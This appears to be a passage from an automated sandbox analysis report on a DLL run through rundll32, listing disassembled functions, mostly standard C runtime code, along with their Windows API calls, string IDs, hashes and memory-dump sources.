              • Opcode ID: 33078b5a48b1cb3652776a81294ff222925e90476b64218e58754a2518311b84
              • Instruction ID: 828bf70aabec8da5f72e49fbffe0f4d003aabd93dbe7dc05b85f7a33ae7ee12c
              • Opcode Fuzzy Hash: 33078b5a48b1cb3652776a81294ff222925e90476b64218e58754a2518311b84
              • Instruction Fuzzy Hash: 2CA10E32A157059BCF099F68D851BAD3BB5AF07328F28025DE8119F2D2CB35D823CB91
              Function 6F9F69E0 Relevance: 13.9, APIs: 9, Instructions: 354COMMON
              Download Yara Rule
              APIs
              • mydllmain.DLL1(00000000,?), ref: 6F9F6A97
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: mydllmain
              • String ID:
              • API String ID: 979097349-0
              • Opcode ID: 42af1bba095e08f3a14e334087738255b175f57d1233d889ccf1f4d9190aca35
              • Instruction ID: afd562df5538cbba07914ef7081aaad4251653abe29e440ad01e48ce1ccfee6b
              • Opcode Fuzzy Hash: 42af1bba095e08f3a14e334087738255b175f57d1233d889ccf1f4d9190aca35
              • Instruction Fuzzy Hash: 9DE14C31E0522A8BCB75CF288D947DDB7B5AF9A300F1581E9C999A7340D671AEC1CF90
              Function 6F9E4E2A Relevance: 12.6, APIs: 4, Strings: 3, Instructions: 303COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • type_info::operator==.LIBVCRUNTIME ref: 6F9E4F49
              • ___TypeMatch.LIBVCRUNTIME ref: 6F9E5057
              • _UnwindNestedFrames.LIBCMT ref: 6F9E51A9
              • CallUnexpected.LIBVCRUNTIME ref: 6F9E51C4
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: CallFramesMatchNestedTypeUnexpectedUnwindtype_info::operator==
              • String ID: csm$csm$csm
              • API String ID: 2751267872-393685449
              • Opcode ID: 4fabeb4c11d48cb0691c48f521481161fa39932734a92640b097eb783114b5c2
              • Instruction ID: dcb7577ef46a413af80cc7edb809be7dd44db4107f8aecf8dffd11f69d67dc73
              • Opcode Fuzzy Hash: 4fabeb4c11d48cb0691c48f521481161fa39932734a92640b097eb783114b5c2
              • Instruction Fuzzy Hash: 18B18879800309EFCF16DFA8D88099EBBB9BF14314F10456AE815AB2D6D731EA51CF91
              Function 6F9E4890 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 120COMMON
              Download Yara Rule
              APIs
              • _ValidateLocalCookies.LIBCMT ref: 6F9E48C7
              • ___except_validate_context_record.LIBVCRUNTIME ref: 6F9E48CF
              • _ValidateLocalCookies.LIBCMT ref: 6F9E4958
              • __IsNonwritableInCurrentImage.LIBCMT ref: 6F9E4983
              • mydllmain.DLL1(?,00000001), ref: 6F9E499C
              • _ValidateLocalCookies.LIBCMT ref: 6F9E49D8
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_recordmydllmain
              • String ID: csm
              • API String ID: 2845398917-1018135373
              • Opcode ID: 1e01a54927e55d3f9290ce93a6d010125ad1af031cc4b6a2123dd151d90c4721
              • Instruction ID: 21fb42a514ff7f82a3bed27f9cef5fe730e8158c28642f6dcdd3b1be25258db8
              • Opcode Fuzzy Hash: 1e01a54927e55d3f9290ce93a6d010125ad1af031cc4b6a2123dd151d90c4721
              • Instruction Fuzzy Hash: F141A438A00209AFCF01CF6CD880A9EBBB5BF45728F108155D924AB3D2D735EA16CF91
              Function 6F9EEA0D Relevance: 10.8, APIs: 7, Instructions: 329COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: _strrchr
              • String ID:
              • API String ID: 3213747228-0
              • Opcode ID: aea14ec4fce50e11b916ea9db58d0fd03005b2f780920c9197a192cf75d5e781
              • Instruction ID: bdf005cc19e2d7ec3f58392d5ed710c38c52e297eee3e145a5f394f74fd62591
              • Opcode Fuzzy Hash: aea14ec4fce50e11b916ea9db58d0fd03005b2f780920c9197a192cf75d5e781
              • Instruction Fuzzy Hash: C6B15872A403559FEB13DF68CC81BAE7BA9EF5A314F164156E804AF2C2D374E801C7A0
              Function 6F9EFA83 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 74COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • FreeLibrary.KERNEL32(00000000,?,6F9EFB92,6F9E60D4,B586E81C,00000000,6F9EAAAA,00000000,?,6F9EFD0B,00000022,FlsSetValue,6F9FD4F0,ccs,6F9EAAAA), ref: 6F9EFB44
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: FreeLibrary
              • String ID: api-ms-$ext-ms-
              • API String ID: 3664257935-537541572
              • Opcode ID: d33869abf37a2e39349a80122c16a8d929b4ff648a9d224b67a12360d05aa2a0
              • Instruction ID: 8133653013bf0186c70dd80af1c3884fa01e03f410e98773ab18913ab33be5a3
              • Opcode Fuzzy Hash: d33869abf37a2e39349a80122c16a8d929b4ff648a9d224b67a12360d05aa2a0
              • Instruction Fuzzy Hash: 4F21D572A06611E7DB239E65FC50A4A377CEF8277CB194116ED19AB2C4E730F901C6D0
              Function 6F9EC7A6 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 42libraryloaderCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,F9A742C7,6F9EAAAA,?,00000000,6F9FAA10,000000FF,?,6F9EC740,B586E81C,?,6F9EC714,?), ref: 6F9EC7DB
              • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 6F9EC7ED
              • mydllmain.DLL1(B586E81C,?,00000000,6F9FAA10,000000FF,?,6F9EC740,B586E81C,?,6F9EC714,?), ref: 6F9EC7FE
              • FreeLibrary.KERNEL32(00000000,?,00000000,6F9FAA10,000000FF,?,6F9EC740,B586E81C,?,6F9EC714,?), ref: 6F9EC80F
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: AddressFreeHandleLibraryModuleProcmydllmain
              • String ID: CorExitProcess$mscoree.dll
              • API String ID: 361333426-1276376045
              • Opcode ID: eab947acee68a7a8a253edc9dd6ad3e8e088a2edcaaa0ab7ef83d3f8f5d4227b
              • Instruction ID: ed39819689001fbccc8f9033173810a13d08aa10c6040bf05aacbddeec0a1a8f
              • Opcode Fuzzy Hash: eab947acee68a7a8a253edc9dd6ad3e8e088a2edcaaa0ab7ef83d3f8f5d4227b
              • Instruction Fuzzy Hash: 61018F31905A1AEBEB128F50CC09BAEBBB8FB44764F004526E822A26C0DB34D901CE90
              Function 6F9EE197 Relevance: 9.3, APIs: 6, Instructions: 292COMMONLIBRARYCODE
              Download Yara Rule
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID:
              • String ID:
              • API String ID:
              • Opcode ID: b108430ace2ae2e195cb0785f84125f37a562e01eb83432d2d944133b503c69e
              • Instruction ID: 7647802357515487b534f0337983a4b01f546191ea04af5b775c0ba7a625cba5
              • Opcode Fuzzy Hash: b108430ace2ae2e195cb0785f84125f37a562e01eb83432d2d944133b503c69e
              • Instruction Fuzzy Hash: 84B10570A0434AAFDB03EFA8D880BAD7BB5BF5A314F024159E5149B3C2D771E956CB60
              Function 6F9E4AF3 Relevance: 9.1, APIs: 6, Instructions: 60COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetLastError.KERNEL32(00000001,?,6F9E4A71,6F9E3517,6F9E2EE4,?,6F9E311C,?,00000001,?,?,00000001,?,6FA01FC8,0000000C,6F9E3215), ref: 6F9E4B01
              • ___vcrt_FlsGetValue.LIBVCRUNTIME ref: 6F9E4B0F
              • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 6F9E4B28
              • SetLastError.KERNEL32(00000000,6F9E311C,?,00000001,?,?,00000001,?,6FA01FC8,0000000C,6F9E3215,?,00000001,?), ref: 6F9E4B7A
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: ErrorLastValue___vcrt_
              • String ID:
              • API String ID: 3852720340-0
              • Opcode ID: cc22e5fb2661b7a96bb395338c357357c37926b6c562c8c4442c5527a6c381b8
              • Instruction ID: 4e7cf688260096915d7ed344b17a23e7a0b72cfbf78f7a60fa6dcf1adb68d6ca
              • Opcode Fuzzy Hash: cc22e5fb2661b7a96bb395338c357357c37926b6c562c8c4442c5527a6c381b8
              • Instruction Fuzzy Hash: D401F13A20EB122EE6160DBC6C85B5F37A9FF02778324032EE520852D5EF51D8268954
              Function 6F9F2178 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 79COMMON
              Download Yara Rule
              Strings
              • C:\Windows\SysWOW64\rundll32.exe, xrefs: 6F9F2194
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID:
              • String ID: C:\Windows\SysWOW64\rundll32.exe
              • API String ID: 0-2837366778
              • Opcode ID: 28051e527f8b3cbb9e0592dbd45ff72b5e09849b74fff946af79bc4e041ed96f
              • Instruction ID: 2068e1e1066332e983ce4f34bd2a8899538b73368c6988d1c8951a265d3822cf
              • Opcode Fuzzy Hash: 28051e527f8b3cbb9e0592dbd45ff72b5e09849b74fff946af79bc4e041ed96f
              • Instruction Fuzzy Hash: 5C219031606285AFDB259F75CC80A9A77BDFF153787104528E928DB2C1E731EC1287A0
              Function 6F9F7074 Relevance: 7.7, APIs: 5, Instructions: 197COMMON
              Download Yara Rule
              APIs
              • __alloca_probe_16.LIBCMT ref: 6F9F70F9
              • __alloca_probe_16.LIBCMT ref: 6F9F71C2
              • __freea.LIBCMT ref: 6F9F7229
                • Part of subcall function 6F9EE7FE: HeapAlloc.KERNEL32(00000000,6F9F26F1,?,?,6F9F26F1,00000220,?,?,?), ref: 6F9EE830
              • __freea.LIBCMT ref: 6F9F723C
              • __freea.LIBCMT ref: 6F9F7249
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: __freea$__alloca_probe_16$AllocHeap
              • String ID:
              • API String ID: 1096550386-0
              • Opcode ID: e2e89a9ea8593e6b0cfd399966976ac5d5411cee2b145226237d4c9289e38e0a
              • Instruction ID: 3a035033afc96f1722e83c0be7949e2cad1da0b987f837512ae3d8f52a39572c
              • Opcode Fuzzy Hash: e2e89a9ea8593e6b0cfd399966976ac5d5411cee2b145226237d4c9289e38e0a
              • Instruction Fuzzy Hash: 5751E7726023066FEB118FA4DC81EEB3AAEEF55714F15012AFD14D61D1EB30EC5287A2
              Function 6F9E4BD3 Relevance: 7.7, APIs: 5, Instructions: 168COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • mydllmain.DLL1(6FA020D0,00000010,6F9E4D45,?,?,?,?,6FA020F0,00000008,6F9E4DC9,?,?,?,00000000), ref: 6F9E4C32
              • ___AdjustPointer.LIBCMT ref: 6F9E4C9A
              • ___AdjustPointer.LIBCMT ref: 6F9E4CBD
              • ___AdjustPointer.LIBCMT ref: 6F9E4D59
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: AdjustPointer$mydllmain
              • String ID:
              • API String ID: 3586548312-0
              • Opcode ID: a97aed2e2f24b6bc476e67e0494d091584efe8357c4061f7de10aaaa154fc8f0
              • Instruction ID: c14818a5ec750cd00fa8f87ca4a09ccd776b0f63d96feb830be4f3c58c92b239
              • Opcode Fuzzy Hash: a97aed2e2f24b6bc476e67e0494d091584efe8357c4061f7de10aaaa154fc8f0
              • Instruction Fuzzy Hash: 1951DD7A644706AFEB2A8F68D840BEA77B9FF44314F10452AD8158B2D1D731F880CF90
              Function 6F9E60DA Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 181COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F9E6177
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F9E627E
              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 6F9E6291
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
              • String ID: 5q
              • API String ID: 885266447-1627527040
              • Opcode ID: 4fd9d191c58d79bcdf1769613de63e25729df438f3d71490d2be7c779e85855a
              • Instruction ID: d2e6a76b97a456878d7e59d4998a50ddac5099b96952788c9c33bea20682c7c5
              • Opcode Fuzzy Hash: 4fd9d191c58d79bcdf1769613de63e25729df438f3d71490d2be7c779e85855a
              • Instruction Fuzzy Hash: D1519471A10209AFCF16CF98C940EDEBBB6EF8A314F148159E954AB395D330EE12CB50
              Function 6F9E5C02 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 27libraryCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,?,6F9E5BB3,00000000,?,00000001,?,?,?,6F9E5CA2,00000001,FlsFree,6F9FBCD8,FlsFree), ref: 6F9E5C0F
              • GetLastError.KERNEL32(?,6F9E5BB3,00000000,?,00000001,?,?,?,6F9E5CA2,00000001,FlsFree,6F9FBCD8,FlsFree,00000000,?,6F9E4BC8), ref: 6F9E5C19
              • LoadLibraryExW.KERNEL32(00000000,00000000,00000000), ref: 6F9E5C41
              Strings
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: LibraryLoad$ErrorLast
              • String ID: api-ms-
              • API String ID: 3177248105-2084034818
              • Opcode ID: f3a7936ef8d702ea13330c677b76a87a2ea3cd541a6e0d0fa7ace175b40a3a47
              • Instruction ID: bb9b3e72322580271ff16fafcc9dce7d61706d896de649dfeb7fe008e0c223cc
              • Opcode Fuzzy Hash: f3a7936ef8d702ea13330c677b76a87a2ea3cd541a6e0d0fa7ace175b40a3a47
              • Instruction Fuzzy Hash: EDE04F7128820AB7FF211E64ED06F493B79AF41B55F144020FA0CE80D4EB62E9208A89
              Function 6F9F0966 Relevance: 6.3, APIs: 4, Instructions: 333fileCOMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • GetConsoleOutputCP.KERNEL32(F9A742C7,00000000,00000000,?), ref: 6F9F09C9
                • Part of subcall function 6F9F2CC5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F721F,?,00000000,-00000008), ref: 6F9F2D26
              • WriteFile.KERNEL32(?,?,00000000,?,00000000), ref: 6F9F0C1B
              • WriteFile.KERNEL32(?,?,00000001,?,00000000), ref: 6F9F0C61
              • GetLastError.KERNEL32 ref: 6F9F0D04
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: FileWrite$ByteCharConsoleErrorLastMultiOutputWide
              • String ID:
              • API String ID: 2112829910-0
              • Opcode ID: ee8da23ffb8ad237d983f91d22594d1bbf0df130d2701cfd982eb9402a0e08f6
              • Instruction ID: be717b506e847ebdd8a4899fab936612b21bd204c3155401ad22080883c17d45
              • Opcode Fuzzy Hash: ee8da23ffb8ad237d983f91d22594d1bbf0df130d2701cfd982eb9402a0e08f6
              • Instruction Fuzzy Hash: 71D18AB5D056499FCF01CFA8D8809EDBBB8FF09314F14916AE466AB3A1D730E916CB50
              Function 6F9F9163 Relevance: 6.1, APIs: 4, Instructions: 147COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,6F9F8ACF), ref: 6F9F917C
              • mydllmain.DLL1(00000001,?,?), ref: 6F9F92F0
              • mydllmain.DLL1(00000002,?,?), ref: 6F9F9336
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: mydllmain$DecodePointer
              • String ID:
              • API String ID: 253863441-0
              • Opcode ID: 4ab6d6fe434442ba140f74252297e0d41396fc9a7f8cbc31e2f3a2cf008151f3
              • Instruction ID: 4a631ff00f79ae1f6daa3b14ac59bb601d52ad68c09f487b39f19c2a0100ef4c
              • Opcode Fuzzy Hash: 4ab6d6fe434442ba140f74252297e0d41396fc9a7f8cbc31e2f3a2cf008151f3
              • Instruction Fuzzy Hash: 9751597090660ADBEF109FA9ED483EDBF78BF8A314F018245D590AA2DCCB74D562CB54
              Function 6F9F1A14 Relevance: 6.1, APIs: 4, Instructions: 82COMMON
              Download Yara Rule
              APIs
                • Part of subcall function 6F9F2CC5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F721F,?,00000000,-00000008), ref: 6F9F2D26
              • GetLastError.KERNEL32 ref: 6F9F1A78
              • __dosmaperr.LIBCMT ref: 6F9F1A7F
              • GetLastError.KERNEL32(?,?,?,?), ref: 6F9F1AB9
              • __dosmaperr.LIBCMT ref: 6F9F1AC0
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: ErrorLast__dosmaperr$ByteCharMultiWide
              • String ID:
              • API String ID: 1913693674-0
              • Opcode ID: 79a78cb0727e590f74047a1533c07c307691a6679fa9898d480f14385450da65
              • Instruction ID: 7f9164fb7cac6044c892e292e2789cdcb407ab16005dc69322be420e244c422d
              • Opcode Fuzzy Hash: 79a78cb0727e590f74047a1533c07c307691a6679fa9898d480f14385450da65
              • Instruction Fuzzy Hash: 0121D4B1606705AFD7509F76C88095BB7BDFF16368710851AE828972C0E731EC928BD0
              Function 6F9F2D68 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
              Download Yara Rule
              APIs
              • GetEnvironmentStringsW.KERNEL32 ref: 6F9F2D70
                • Part of subcall function 6F9F2CC5: WideCharToMultiByte.KERNEL32(?,00000000,00000000,00000000,?,-00000008,?,00000000,-00000008,-00000008,00000000,?,6F9F721F,?,00000000,-00000008), ref: 6F9F2D26
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F9F2DA8
              • FreeEnvironmentStringsW.KERNEL32(00000000), ref: 6F9F2DC8
              Memory Dump Source
              • Source File: 00000003.00000002.2057630096.000000006F9E1000.00000020.00000001.01000000.00000003.sdmp, Offset: 6F9E0000, based on PE: true
              • Associated: 00000003.00000002.2057615506.000000006F9E0000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057651853.000000006F9FB000.00000002.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057668761.000000006FA03000.00000004.00000001.01000000.00000003.sdmpDownload File
              • Associated: 00000003.00000002.2057685142.000000006FA05000.00000002.00000001.01000000.00000003.sdmpDownload File
              Joe Sandbox IDA Plugin
              • Snapshot File: hcaresult_3_2_6f9e0000_rundll32.jbxd
              Similarity
              • API ID: EnvironmentStrings$Free$ByteCharMultiWide
              • String ID:
              • API String ID: 158306478-0
              • Opcode ID: baf4159828b1a641f5f734c50fe31129232d30826f66e0cdaf5c25621d9981a6
              • Instruction ID: 1613eefbff378ab773b0501895d883bd5d73bf501c341c8cdfcdd4f4740115ae
              • Opcode Fuzzy Hash: baf4159828b1a641f5f734c50fe31129232d30826f66e0cdaf5c25621d9981a6
              • Instruction Fuzzy Hash: E21126B15076967FAB129BB59D8CEAF6A6CDF9A2E83100014F901D11C1FB30DE1287B1
              Function 6F9F82CD Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE
              Download Yara Rule
              APIs
              • WriteConsoleW.KERNEL32(00000000,00000000,6F9EB4BB,00000000,00000000,?,6F9F6961,00000000,00000001,?,?,?,6F9F0D58,?,00000000,00000000), ref: 6F9F82E4
